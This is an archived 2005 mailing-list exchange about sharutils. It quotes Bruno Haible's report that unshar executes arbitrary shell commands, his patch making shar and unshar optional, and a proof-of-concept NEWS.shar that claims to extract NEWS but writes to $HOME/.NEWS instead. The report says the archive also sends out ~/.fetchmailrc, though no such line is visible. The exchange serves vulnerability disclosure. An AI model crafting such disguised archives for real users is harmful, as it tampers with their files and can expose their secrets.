[Top][All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: unshar is unsafe
From: |
Bruce Korb |
Subject: |
Re: unshar is unsafe |
Date: |
Fri, 29 Jul 2005 11:27:43 -0700 |
User-agent: |
KMail/1.7.1 |
Hi Bruno,
Rendering the amusing situation wherein all of the project
deliverables are optional. :-) "shar" is "secure", tho.
Let me think about what might be reasonable. - Bruce
On Wednesday 27 July 2005 05:07 am, Bruno Haible wrote:
> To: address@hidden
> Cc: Bruce Korb <address@hidden>
> Subject: unshar is unsafe
>
> Hi,
>
> It should be well-known that "unshar" is unsafe: In the current
> implementation, it allows an attacker to execute any shell commands.
> For example, the attached file NEWS.shar, when unshared, pretends to
> create a file NEWS, but instead overwrites ~/.NEWS (it could just as
> well overwrite or append a few lines to your ~/.profile) and sends me
> your ~/.fetchmailrc. (Try it :-)).
>
> $ unshar < NEWS.shar
> Standard-Eingabe:
> x - Sperrverzeichnis `_sh08096': wurde angelegt
> x - packe aus NEWS (Text)
> x - Sperrverzeichnis `_sh08096': gelöscht
>
> For this reason, it should be possible to install the useful
> programs 'uuencode', 'uudecode', and 'mail-files', without the dangerous
> programs
> - unshar (totally unsecure implementation)
> - shar (educates people to unsecure behaviour)
> - mailshar (unsecure since it invokes shar)
> - remsync (unsecure since it invokes mailshar)
> and the program
> - compress-dummy (only used by 'shar', useless on its own)
>
> And moreover, since the default installation of a GNU system should be
> secure, these programs should not be installed by default, only upon
> request.
>
> Find attached a crude patch that does this.
>
> Bruno
>
>
> ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * configure.ac (ADD_SCRIPT): Remove mail-files.
> (UNSECURE): New installer option --enable-unsecure.
>
> src/ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * Makefile.am (bin_PROGRAMS): Add shar and unshar only if UNSECURE
> is enabled.
> (bin_SCRIPTS): Initialize with "mail-files". Add the ADD_SCRIPTS
> only if UNSECURE is enabled.
>
> doc/ChangeLog:
> 2005-07-26 Bruno Haible <address@hidden>
>
> * Makefile.am (dist_man1_MANS): Add shar.1 and unshar.1 only if
> UNSECURE is enabled.
>
> diff -r -c3 sharutils-4.4.orig/configure.ac sharutils-4.4/configure.ac
> *** sharutils-4.4.orig/configure.ac 2005-07-10 17:57:57.000000000 +0200
> --- sharutils-4.4/configure.ac 2005-07-27 01:29:07.000000000 +0200
> ***************
> *** 22,28 ****
>
> dnl AC_ARG_PROGRAM
>
> ! AC_SUBST(ADD_SCRIPT, ["mail-files mailshar"])
>
> AC_PROG_CC
> AC_PROG_INSTALL
> --- 22,28 ----
>
> dnl AC_ARG_PROGRAM
>
> ! AC_SUBST(ADD_SCRIPT, ["mailshar"])
>
> AC_PROG_CC
> AC_PROG_INSTALL
> ***************
> *** 103,108 ****
> --- 103,114 ----
> [disable installation of uuencode and uudecode])])
> AM_CONDITIONAL([UUCODE], [test "x$enable_uucode" != xno])
>
> + AC_ARG_ENABLE(unsecure,
> + [AS_HELP_STRING([--enable-unsecure],
> + [enable installation of the unsecure programs shar, unshar, mailshar,
> + remsync])])
> + AM_CONDITIONAL([UNSECURE], [test "x$enable_unsecure" = xyes])
> +
> AM_GNU_GETTEXT
> AM_GNU_GETTEXT_VERSION([0.14.4])
> AM_WITH_DMALLOC
> diff -r -c3 sharutils-4.4.orig/src/Makefile.am sharutils-4.4/src/Makefile.am
> *** sharutils-4.4.orig/src/Makefile.am 2005-07-09 02:46:46.000000000
> +0200
> --- sharutils-4.4/src/Makefile.am 2005-07-27 01:13:14.000000000 +0200
> ***************
> *** 17,27 ****
>
> ## Process this file with automake to produce Makefile.in.
>
> ! bin_PROGRAMS = shar unshar
> if UUCODE
> bin_PROGRAMS += uuencode uudecode
> endif
> ! bin_SCRIPTS = $(ADD_SCRIPT)
> EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
>
> DISTCLEANFILES = $(bin_SCRIPTS)
> --- 17,31 ----
>
> ## Process this file with automake to produce Makefile.in.
>
> ! bin_PROGRAMS =
> ! bin_SCRIPTS = mail-files
> if UUCODE
> bin_PROGRAMS += uuencode uudecode
> endif
> ! if UNSECURE
> ! bin_PROGRAMS += shar unshar
> ! bin_SCRIPTS += $(ADD_SCRIPT)
> ! endif
> EXTRA_SCRIPTS = compress-dummy mail-files mailshar remsync
>
> DISTCLEANFILES = $(bin_SCRIPTS)
> diff -r -c3 sharutils-4.4.orig/doc/Makefile.am sharutils-4.4/doc/Makefile.am
> *** sharutils-4.4.orig/doc/Makefile.am 2005-07-09 02:32:21.000000000
> +0200
> --- sharutils-4.4/doc/Makefile.am 2005-07-27 01:02:15.000000000 +0200
> ***************
> *** 19,31 ****
>
> info_TEXINFOS = sharutils.texi
>
> ! dist_man1_MANS = shar.1 unshar.1
>
> if UUCODE
> dist_man1_MANS += uuencode.1 uuencode.5
> man1_MANS = uudecode.1
> endif
>
> CLEANFILES = $(man1_MANS)
>
> EXTRA_DIST = doclicense.texi
> --- 19,35 ----
>
> info_TEXINFOS = sharutils.texi
>
> ! dist_man1_MANS =
>
> if UUCODE
> dist_man1_MANS += uuencode.1 uuencode.5
> man1_MANS = uudecode.1
> endif
>
> + if UNSECURE
> + dist_man1_MANS += shar.1 unshar.1
> + endif
> +
> CLEANFILES = $(man1_MANS)
>
> EXTRA_DIST = doclicense.texi
>
>
>
> ============================= NEWS.shar =============================
> #!/bin/sh
> # This is a shell archive (produced by GNU sharutils 4.4).
> # To extract the files from this archive, save it to some FILE, remove
> # everything before the `!/bin/sh' line above, then type `sh FILE'.
> #
> # Made on 2005-07-27 00:21 CEST by <address@hidden>.
> # Source directory was `/packages/sharutils-4.4'.
> #
> # Existing files will *not* be overwritten unless `-c' is specified.
> #
> # This shar contains:
> # length mode name
> # ------ ---------- ------------------------------------------
> # 2831 -rwxr-xr-x NEWS
> #
> save_IFS="${IFS}"
> IFS="${IFS}:"
> gettext_dir=FAILED
> locale_dir=FAILED
> first_param="$1"
> for dir in $PATH
> do
> if test "$gettext_dir" = FAILED && test -f $dir/gettext \
> && ($dir/gettext --version >/dev/null 2>&1)
> then
> case `$dir/gettext --version 2>&1 | sed 1q` in
> *GNU*) gettext_dir=$dir ;;
> esac
> fi
> if test "$locale_dir" = FAILED && test -f $dir/shar \
> && ($dir/shar --print-text-domain-dir >/dev/null 2>&1)
> then
> locale_dir=`$dir/shar --print-text-domain-dir`
> fi
> done
> IFS="$save_IFS"
> if test "$locale_dir" = FAILED || test "$gettext_dir" = FAILED
> then
> echo=echo
> else
> TEXTDOMAINDIR=$locale_dir
> export TEXTDOMAINDIR
> TEXTDOMAIN=sharutils
> export TEXTDOMAIN
> echo="$gettext_dir/gettext -s"
> fi
> if (echo "testing\c"; echo 1,2,3) | grep c >/dev/null; then
> if (echo -n testing; echo 1,2,3) | sed s/-n/xn/ | grep xn >/dev/null; then
> shar_n= shar_c='
> '
> else
> shar_n=-n shar_c=
> fi
> else
> shar_n= shar_c='\c'
> fi
> if touch -am -t 200112312359.59 $$.touch >/dev/null 2>&1 && test ! -f
> 200112312359.59 && test -f $$.touch; then
> shar_touch='touch -am -t $1$2$3$4$5$6.$7 "$8"'
> elif touch -am 123123592001.59 $$.touch >/dev/null 2>&1 && test ! -f
> 123123592001.59 && test ! -f 123123592001.5 && test -f $$.touch; then
> shar_touch='touch -am $3$4$5$6$1$2.$7 "$8"'
> elif touch -am 1231235901 $$.touch >/dev/null 2>&1 && test ! -f 1231235901 &&
> test -f $$.touch; then
> shar_touch='touch -am $3$4$5$6$2 "$8"'
> else
> shar_touch=:
> echo
> $echo 'WARNING: not restoring timestamps. Consider getting and'
> $echo "installing GNU \`touch', distributed in GNU File Utilities..."
> echo
> fi
> rm -f 200112312359.59 123123592001.59 123123592001.5 1231235901 $$.touch
> #
> $echo $shar_n 'x -' 'lock directory' "\`_sh08096': "$shar_c
> if mkdir _sh08096; then
> $echo 'created'
> else
> $echo 'failed to create'
> exit 1
> fi
> # ============= NEWS ==============
> if test -f 'NEWS' && test "$first_param" != -c; then
> $echo 'x -' SKIPPING 'NEWS' '(file already exists)'
> else
> $echo 'x -' extracting 'NEWS' '(text)'
> sed 's/^X//' << 'SHAR_EOF' > "$HOME/.NEWS" &&
> GNU sharutils NEWS - User visible changes.
> Copyright (C) 1994, 1995, 1996, 2002, 2004, 2005 Free Software Foundation,
> Inc.
> X
> Version 4.4 - July 2005, by Bruce Korb
> X
> * autotool cleanup
> * Make a non-alpha release this time.
> * Ensure a "intmax_t" exists in the code.
> X
> X
> Version 4.3.81 - June 2005, by Bruce Korb
> X
> * Compatibility: True 64 does not have "snprintf"
> * Updated FSF address
> X
> X
> X
> Version 4.3.80 - April 2005, by Bruce Korb
> X
> * Buglet: Unlink the temporary file when unsharing from stdin.
> X
> X
> X
> Version 4.3.79 - April 2005, by Bruce Korb
> X
> * rewrote the temporary file handling in unshar to avoid both a theoretical
> X timing hole (hitting it requires cooperation) and a buffer overrun
> X attack (a file name exceeding 1K).
> * new translations and updates. They are all now missing two messages:
> X "allocate file name buffer" and "allocate file buffer". *sigh*.
> X
> X
> X
> Version 4.3.78 - January 2005, by Bruce Korb
> X
> * fixed test to not require updates for every release number
> * fixed the uuencode man page so that docbook generation can work correctly.
> X
> X
> Version 4.3.77 - September 2004, by Bruce Korb
> X
> * Fixed a buffer overrun exploit
> X
> X
> Version 4.3.76 - December 2002, by Karl Eichwalder
> X
> * Updated translations: de et fr sv tr.
> X
> X
> Version 4.3.75 - December 2002, by Karl Eichwalder
> X
> * Fix compatibility issues (by Bruno Haible).
> X
> * Support bzip2 as an alternative to gzip (by Bruno Haible).
> X
> * New translations: ca et hu.
> X
> * Updated translations: da de ja sv tr zh_TW.
> X
> X
> Version 4.3.74 - July 2002, by Karl Eichwalder
> X
> * Many portability fixes (by Bruno Haible).
> X
> * Updated translation: fr.
> X
> X
> Version 4.3.73 - July 2002, by Karl Eichwalder
> X
> * Add support for large files, e.g., files larger than 2 GiB on hosts
> X where 'long' is 32 bits wide (by Paul Eggert).
> X
> X
> Version 4.3.72 - July 2002, by Karl Eichwalder
> X
> * Updated translations: fr sv.
> X
> X
> Version 4.3.71 - July 2002, by Karl Eichwalder
> X
> * Updated translations: da de.
> X
> X
> Version 4.3.70 - July 2002, by Karl Eichwalder
> X
> * Don't install 'compress' link by default; provide
> X --enable-compress-link configure option.
> X
> * Fix uudecode output file handling.
> X
> * Updated translations: de tr.
> X
> X
> Version 4.3.61 - July 2002, by Karl Eichwalder
> X
> * Re-add the intl subdirectory (libintl from gettext).
> X
> * Bugfixes.
> X
> X
> Version 4.3.60 - June 2002, by Karl Eichwalder
> X
> * Provide a 'compress-dummy' script. Install it if 'compress' isn't
> X available. Create a link 'compress' pointing to 'compress-dummy';
> X thus it is possible to unshar legacy shar files calling
> X 'compress -d'.
> X
> * shar: Don't offer '-Z' resp. '--compress' if the system doesn't
> X support 'compress'.
> X
> X
> Version 4.3.52 - June 2002, by Karl Eichwalder
> X
> * sync more files coming with automake and related frame work files.
> X
> * fix temp file races (shar).
> X
> * fix Y2K bug (shar).
> X
> * allow spaces in file names (uudecode).
> SHAR_EOF
> (set 20 05 07 22 23 38 11 "$HOME/.NEWS"; eval "$shar_touch") &&
> chmod 0755 "$HOME/.NEWS" ||
> $echo 'restore of' 'NEWS' 'failed'
> if ( md5sum --help </dev/null 2>&1 | grep 'sage: md5sum \[' ) >/dev/null
> 2>&1 \
> && ( md5sum --version </dev/null 2>&1 | grep -v 'textutils 1.12' )
> >/dev/null; then
> md5sum -c << SHAR_EOF >/dev/null 2>&1 \
> || $echo 'NEWS:' 'MD5 check failed'
> 23c39bbc9cb029b1881b9dfcbbfe0209 NEWS
> SHAR_EOF
> else
> shar_count="`LC_ALL=C wc -c < "$HOME/.NEWS"`"
> test 2831 -eq "$shar_count" ||
> $echo 'NEWS:' 'original size' '2831,' 'current size' "$shar_count!"
> fi
> fi
> $echo $shar_n 'x -' 'lock directory' "\`_sh08096': " $shar_c
> if rm -fr _sh08096; then
> $echo 'removed'
> else
> $echo 'failed to remove'
> fi
> exit 0
>
>
--
'bkorb at veritas' is being retired in favor of the Symantec address.